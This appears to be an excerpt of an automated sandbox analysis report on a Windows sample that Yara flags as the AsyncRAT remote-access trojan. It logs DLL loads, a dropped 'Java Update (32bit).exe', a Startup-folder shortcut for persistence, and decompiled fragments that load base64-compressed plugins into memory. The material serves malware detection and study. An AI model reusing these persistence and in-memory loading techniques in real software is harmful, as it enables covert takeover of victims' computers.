Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll

Source: C:\Users\user\Desktop\03VPFXH490.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: Java Update (32bit).lnk.0.dr

LNK file: ..\..\..\..\..\..\..\..\..\ProgramData\Java Update (32bit).exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 03VPFXH490.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 03VPFXH490.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 03VPFXH490.exe, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 03VPFXH490.exe, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 03VPFXH490.exe, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)
Source: Java Update (32bit).exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Java Update (32bit).exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: Java Update (32bit).exe.0.dr, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { Pack[2] }}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: 03VPFXH490.exe, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 03VPFXH490.exe, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 03VPFXH490.exe, Messages.cs	.Net Code: Memory
Source: Java Update (32bit).exe.0.dr, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: Java Update (32bit).exe.0.dr, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: Java Update (32bit).exe.0.dr, Messages.cs	.Net Code: Memory

Source: C:\Users\user\Desktop\03VPFXH490.exe	Code function: 0_2_00007FFD9BAD00BD pushad ; iretd	0_2_00007FFD9BAD00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9B99D2A5 pushad ; iretd	1_2_00007FFD9B99D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9BAB00BD pushad ; iretd	1_2_00007FFD9BAB00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFD9BB82316 push 8B485F93h; iretd	1_2_00007FFD9BB8231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9B99D2A5 pushad ; iretd	4_2_00007FFD9B99D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9BABC2C5 push ebx; iretd	4_2_00007FFD9BABC2DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9BAB00BD pushad ; iretd	4_2_00007FFD9BAB00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 4_2_00007FFD9BB82316 push 8B485F93h; iretd	4_2_00007FFD9BB8231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9B97D2A5 pushad ; iretd	7_2_00007FFD9B97D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9BA97354 push eax; iretd	7_2_00007FFD9BA97361
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9BA972D4 push ds; iretd	7_2_00007FFD9BA97302
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9BA971FB push ss; iretd	7_2_00007FFD9BA97272
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9BA9858C push edi; iretd	7_2_00007FFD9BA9859A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9BA985CC push edi; iretd	7_2_00007FFD9BA9859A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9BA9854C push esi; iretd	7_2_00007FFD9BA9857A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9BA900BD pushad ; iretd	7_2_00007FFD9BA900C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00007FFD9BB62316 push 8B485F95h; iretd	7_2_00007FFD9BB6231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9B99D2A5 pushad ; iretd	11_2_00007FFD9B99D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9BAB00BD pushad ; iretd	11_2_00007FFD9BAB00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFD9BB82316 push 8B485F93h; iretd	11_2_00007FFD9BB8231B

Source: C:\Users\user\Desktop\03VPFXH490.exe

File created: C:\ProgramData\Java Update (32bit).exe

Jump to dropped file

Source: C:\Users\user\Desktop\03VPFXH490.exe

File created: C:\ProgramData\Java Update (32bit).exe

Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 03VPFXH490.exe, type: SAMPLE
Source: Yara match	File source: 0.0.03VPFXH490.exe.a50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1675093210.0000000000A52000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 03VPFXH490.exe PID: 7316, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\Java Update (32bit).exe, type: DROPPED

Source: C:\Users\user\Desktop\03VPFXH490.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk

Jump to behavior

Source: C:\Users\user\Desktop\03VPFXH490.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java Update (32bit).lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\03VPFXH490.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
